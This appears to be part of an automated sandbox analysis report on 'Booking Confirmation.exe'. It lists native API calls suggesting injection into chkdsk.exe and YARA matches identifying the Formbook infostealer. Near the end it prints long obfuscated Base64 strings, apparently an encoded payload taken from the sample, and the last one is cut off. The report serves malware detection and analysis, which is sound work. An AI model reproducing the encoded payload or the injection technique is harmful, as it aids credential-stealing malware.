Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D298A0 NtWriteVirtualMemory,	8_2_04D298A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2B040 NtSuspendThread,	8_2_04D2B040
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29820 NtEnumerateKey,	8_2_04D29820
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D299D0 NtCreateProcessEx,	8_2_04D299D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29950 NtQueueApcThread,	8_2_04D29950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A80 NtOpenDirectoryObject,	8_2_04D29A80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A10 NtQuerySection,	8_2_04D29A10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A00 NtProtectVirtualMemory,	8_2_04D29A00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29A20 NtResumeThread,	8_2_04D29A20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D2A3B0 NtGetContextThread,	8_2_04D2A3B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D29B00 NtSetValueKey,	8_2_04D29B00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339D60 NtCreateFile,	8_2_04339D60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339E10 NtReadFile,	8_2_04339E10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339E90 NtClose,	8_2_04339E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339F40 NtAllocateVirtualMemory,	8_2_04339F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339D1C NtCreateFile,	8_2_04339D1C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339D62 NtCreateFile,	8_2_04339D62
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339DB2 NtReadFile,	8_2_04339DB2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04339E0A NtReadFile,	8_2_04339E0A

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 0_2_0247C2B0	0_2_0247C2B0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 0_2_02479990	0_2_02479990
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 0_2_002C379D	0_2_002C379D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 4_2_002D379D	4_2_002D379D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041E212	5_2_0041E212
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041D306	5_2_0041D306
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041E5B7	5_2_0041E5B7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041E5BA	5_2_0041E5BA
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00409E40	5_2_00409E40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00409E3B	5_2_00409E3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CFA6	5_2_0041CFA6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186F900	5_2_0186F900
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120	5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B090	5_2_0187B090
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0	5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019320A8	5_2_019320A8
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019328EC	5_2_019328EC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921002	5_2_01921002
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193E824	5_2_0193E824
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189EBB0	5_2_0189EBB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192DBD2	5_2_0192DBD2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01932B28	5_2_01932B28
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019322AE	5_2_019322AE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581	5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019325DD	5_2_019325DD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187D5E0	5_2_0187D5E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01932D07	5_2_01932D07
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01860D20	5_2_01860D20
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01931D55	5_2_01931D55
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187841F	5_2_0187841F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192D466	5_2_0192D466
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01931FF1	5_2_01931FF1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01932EF7	5_2_01932EF7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192D616	5_2_0192D616
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01886E30	5_2_01886E30
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00DC379D	5_2_00DC379D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAD466	8_2_04DAD466
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF841F	8_2_04CF841F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB25DD	8_2_04DB25DD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFD5E0	8_2_04CFD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581	8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB1D55	8_2_04DB1D55
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB2D07	8_2_04DB2D07
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE0D20	8_2_04CE0D20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB2EF7	8_2_04DB2EF7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAD616	8_2_04DAD616
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D06E30	8_2_04D06E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB1FF1	8_2_04DB1FF1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB28EC	8_2_04DB28EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFB090	8_2_04CFB090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0	8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB20A8	8_2_04DB20A8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1002	8_2_04DA1002
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DBE824	8_2_04DBE824
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEF900	8_2_04CEF900
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D04120	8_2_04D04120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB22AE	8_2_04DB22AE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DADBD2	8_2_04DADBD2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1EBB0	8_2_04D1EBB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB2B28	8_2_04DB2B28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433E5BA	8_2_0433E5BA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04322D90	8_2_04322D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04329E3B	8_2_04329E3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04329E40	8_2_04329E40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04322FB0	8_2_04322FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CFA6	8_2_0433CFA6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433E212	8_2_0433E212
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433D306	8_2_0433D306

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 04CEB150 appears 35 times
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: String function: 0186B150 appears 35 times

Source: Booking Confirmation.exe	Binary or memory string: OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameriched20.dllp( vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: k,\\StringFileInfo\\000004B0\\OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000000.646928778.00000000002C2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.676504964.0000000006D10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000000.00000002.676596861.0000000006E90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Booking Confirmation.exe
Source: Booking Confirmation.exe	Binary or memory string: OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000004.00000002.668906261.00000000002D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
Source: Booking Confirmation.exe	Binary or memory string: OriginalFilename vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000005.00000002.710181246.00000000015BC000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs Booking Confirmation.exe
Source: Booking Confirmation.exe, 00000005.00000002.709572293.0000000000DC2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
Source: Booking Confirmation.exe	Binary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe

Source: Booking Confirmation.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Booking Confirmation.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Booking Confirmation.exe, LogIn.cs	Base64 encoded string: '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
Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+P